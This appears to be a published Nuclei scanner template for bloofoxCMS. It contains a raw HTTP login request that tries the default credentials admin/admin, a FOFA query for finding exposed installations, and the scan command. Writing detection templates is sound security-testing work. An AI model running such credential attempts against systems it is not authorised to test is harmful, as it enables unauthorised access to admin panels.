bloofoxCMS - Default Login

ID: bloofoxcms-default-login

Severity: high

Author: theamanrawat

Tags: bloofox,cms,default-login

Description

bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

id: bloofoxcms-default-login

info:
  name: bloofoxCMS - Default Login
  author: theamanrawat
  severity: high
  description: |
    bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://www.bloofox.com/automated_setup.113.html
    - https://www.bloofox.com
  classification:
    cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: bloofox
    product: bloofoxcms
    fofa-query: "Powered by bloofoxCMS"
  tags: bloofox,cms,default-login

http:
  - raw:
      - |
        POST /admin/index.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&action=login

    attack: pitchfork
    payloads:
      username:
        - "admin"
      password:
        - "admin"
    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - contains(body, 'bloofoxCMS Admincenter')
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100fd73979fc2e69b2e81a9a801b25c3e77d0d9e19abc2fc31e6019a89d21ebfbf502201cdd37db5795c0f216fa347ddb3b9cb4ff5bcb1c0c89bf27be206f94dd5be53b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/bloofoxcms-default-login.yaml"

View on Github